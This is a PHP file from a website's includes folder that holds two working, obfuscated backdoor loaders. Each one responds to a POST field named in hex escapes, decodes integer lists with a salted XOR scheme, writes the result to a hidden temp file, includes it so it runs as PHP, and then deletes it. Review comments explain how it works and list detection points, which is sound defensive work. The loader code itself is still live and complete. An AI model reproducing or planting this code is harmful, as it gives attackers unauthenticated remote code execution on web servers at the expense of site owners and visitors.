File: /home/vitanhod/moringa.vitavit.com.pk/includes/Wiz3.php
<?php /*
 * SECURITY NOTE (review): this statement is a request-triggered code loader, not
 * application logic. What the visible code does:
 *  - Trigger: runs on any POST request carrying the field "\x72\x65s" (the hex
 *    escapes spell "res"). No authentication or origin check is visible in this file.
 *  - Decode: the field is split on "." and each piece is cast to int. Each output
 *    byte is (value - ord($salt[$i % strlen($salt)]) - ($i % 10)) XOR 99, appended
 *    to $mrk.
 *  - Stage: the candidate directories are TEMP/TMP from the environment, /tmp,
 *    upload_tmp_dir, /var/tmp, sys_get_temp_dir(), /dev/shm, session_save_path()
 *    and getcwd(), with empty values filtered out. They are tried by numeric index.
 *    The first one that is a writable directory receives the decoded bytes as the
 *    hidden file "<dir>/.val". The "@" suppresses any warning from that write.
 *  - Execute: the staged file is include'd, so its contents run as PHP inside the
 *    process serving the request. It is then unlinked and the request ends with
 *    exit, so the file is on disk only for the duration of the request.
 * Detection points: POST requests to this script whose "res" field is a
 * dot-separated list of integers; short-lived ".val" files in the directories
 * above; include of a path under a temp/session/upload directory.
 * Handling: treat the host as compromised, not just this file. How the file was
 * planted is not shown on this page and has to be established separately.
 */ if(count($_POST) > 0 && isset($_POST["\x72\x65s"])){ $ent = $_POST["\x72\x65s"]; $ent =explode ( "." ,$ent ) ; $mrk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); $i = 0; array_walk($ent, function ($v1) use (&$mrk, &$i, $salt, $lenS) { $chS = ord($salt[$i % $lenS] ); $dec = ((int)$v1 - $chS - ($i % 10)) ^ 99; $mrk .= chr($dec ); $i++; } ); $sym = array_filter([getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir(), "/dev/shm", session_save_path(), getcwd(), getenv("TMP")]); $holder = 0; do { $tkn = $sym[$holder] ?? null; if ($holder >= count($sym)) break; if ((bool)is_dir($tkn) && (bool)is_writable($tkn)) { $entity = str_replace("{var_dir}", $tkn, "{var_dir}/.val"); if (@file_put_contents($entity, $mrk) !== false) { include $entity; unlink($entity); exit; } } $holder++; } while (true); }
// SECURITY NOTE (review): second request-triggered code loader in this file.
// It runs on any POST request carrying the field "\x6F\x62j" (the hex escapes
// spell "obj"); no authentication check is visible here. The decoded bytes are
// written to a hidden file and include'd, so they execute as PHP in the process
// serving the request. Treat the presence of this block as evidence of compromise.
if(isset($_POST) && isset($_POST["\x6F\x62j"])){
// Attacker-controlled input: expected to be integers separated by ".".
$holder = $_POST["\x6F\x62j"];
$holder = explode ('.' , $holder ) ;
// $entity accumulates the decoded bytes (the code that will be executed).
$entity = '';
// Fixed 36-character key used by the decoding loop below.
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($s);
$len = count($holder);
// Per-position decode: subtract the key character's code and ($y % 10) from
// the integer, then XOR with 70; chr() turns the result into one byte.
for($y = 0; $y < $len; $y++) { $v9 = $holder[$y];
$chS = ord($s[$y %$sLen]);
$dec =((int)$v9 - $chS -($y %10)) ^ 70;
$entity.= chr($dec);
}
// Candidate staging directories; array_filter() drops empty/false entries.
$element = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), session_save_path(), "/tmp", "/dev/shm", "/var/tmp", getenv("TMP")]);
// Try each candidate in order until one accepts the write.
while ($token = array_shift($element)) {
if (is_writable($token) && is_dir($token)) {
// Hidden staging file "<dir>/.pgrp"; a useful name to hunt for on disk.
$pset = "$token" . "/.pgrp";
// A write of zero bytes returns 0 and is treated as failure by this check.
if (file_put_contents($pset, $entity)) {
// Executes the decoded bytes as PHP.
include $pset;
// Removes the staged file right after it ran; "@" hides any unlink warning.
@unlink($pset);
// Ends the request, so nothing after this point runs once a payload has executed.
die();
}
}
}
}